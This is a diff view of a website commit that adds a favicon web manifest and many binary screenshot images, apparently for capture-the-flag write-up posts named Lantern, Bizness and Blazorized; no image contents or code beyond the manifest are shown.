Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 29 KiB

19
assets/img/favicons/site.webmanifest Normal file
View File

@ -0,0 +1,19 @@
{
"name": "",
"short_name": "",
"icons": [
{
"src": "/android-chrome-192x192.png",
"sizes": "192x192",
"type": "image/png"
},
{
"src": "/android-chrome-256x256.png",
"sizes": "256x256",
"type": "image/png"
}
],
"theme_color": "#ffffff",
"background_color": "#ffffff",
"display": "standalone"
}

BIN
assets/img/inspectorardilla.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 30 KiB

BIN
assets/img/post/Bizness5.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 60 KiB

BIN
assets/img/post/Lantern/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 46 KiB

BIN
assets/img/post/Lantern/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 208 KiB

BIN
assets/img/post/Lantern/3.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 40 KiB

BIN
assets/img/post/Lantern/Lantern.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 348 KiB

BIN
assets/img/post/Lantern/image-1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 139 KiB

BIN
assets/img/post/Lantern/image-10.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 424 KiB

BIN
assets/img/post/Lantern/image-11.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 133 KiB

BIN
assets/img/post/Lantern/image-12.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 122 KiB

BIN
assets/img/post/Lantern/image-13.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 243 KiB

BIN
assets/img/post/Lantern/image-14.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 116 KiB

BIN
assets/img/post/Lantern/image-15.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 759 KiB

BIN
assets/img/post/Lantern/image-16.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 54 KiB

BIN
assets/img/post/Lantern/image-17.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 27 KiB

BIN
assets/img/post/Lantern/image-18.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 121 KiB

BIN
assets/img/post/Lantern/image-19.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 29 KiB

BIN
assets/img/post/Lantern/image-2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 40 KiB

BIN
assets/img/post/Lantern/image-20.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 8.6 KiB

BIN
assets/img/post/Lantern/image-21.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 421 KiB

BIN
assets/img/post/Lantern/image-22.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 423 KiB

BIN
assets/img/post/Lantern/image-23.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 27 KiB

BIN
assets/img/post/Lantern/image-24.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 68 KiB

BIN
assets/img/post/Lantern/image-25.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 39 KiB

BIN
assets/img/post/Lantern/image-26.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 35 KiB

BIN
assets/img/post/Lantern/image-27.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 136 KiB

BIN
assets/img/post/Lantern/image-28.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 149 KiB

BIN
assets/img/post/Lantern/image-29.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 804 KiB

BIN
assets/img/post/Lantern/image-3.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 121 KiB

BIN
assets/img/post/Lantern/image-30.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 573 KiB

BIN
assets/img/post/Lantern/image-31.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 306 KiB

BIN
assets/img/post/Lantern/image-4.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 134 KiB

BIN
assets/img/post/Lantern/image-5.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 391 KiB

BIN
assets/img/post/Lantern/image-6.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 14 KiB

BIN
assets/img/post/Lantern/image-7.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 161 KiB

BIN
assets/img/post/Lantern/image-8.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 130 KiB

BIN
assets/img/post/Lantern/image-9.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 47 KiB

BIN
assets/img/post/Lantern/image.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 169 KiB

BIN
assets/img/post/Lantern/proc1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 267 KiB

BIN
assets/img/post/Lantern/proc2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 328 KiB

BIN
assets/img/post/Lantern/proc3.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 598 KiB

BIN
assets/img/post/Lantern/proc4.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.3 MiB

BIN
assets/img/post/Lantern/proc5.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 779 KiB

BIN
assets/img/post/Lantern/proc6.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 508 KiB

BIN
assets/img/post/Lantern/proc7.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 134 KiB

BIN
assets/img/post/Lantern/proc8.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 44 KiB

BIN
assets/img/post/Lantern/proc9.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 267 KiB

BIN
assets/img/post/Untitled.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 142 KiB

BIN
assets/img/post/bizness-card.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 344 KiB

BIN
assets/img/post/bizness.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 131 KiB

BIN
assets/img/post/bizness1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 190 KiB

BIN
assets/img/post/bizness10.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 38 KiB

BIN
assets/img/post/bizness2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 79 KiB

BIN
assets/img/post/bizness3.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 270 KiB

BIN
assets/img/post/bizness4.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 86 KiB

BIN
assets/img/post/bizness6.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 79 KiB

BIN
assets/img/post/bizness7.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 203 KiB

BIN
assets/img/post/bizness8.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 86 KiB

BIN
assets/img/post/bizness9.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 7.3 KiB

BIN
assets/img/post/blazorized/0.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 61 KiB

BIN
assets/img/post/blazorized/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 561 KiB

BIN
assets/img/post/blazorized/10.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 53 KiB

BIN
assets/img/post/blazorized/11.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 5.0 KiB

BIN
assets/img/post/blazorized/12.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 84 KiB

Some files were not shown because too many files have changed in this diff Show More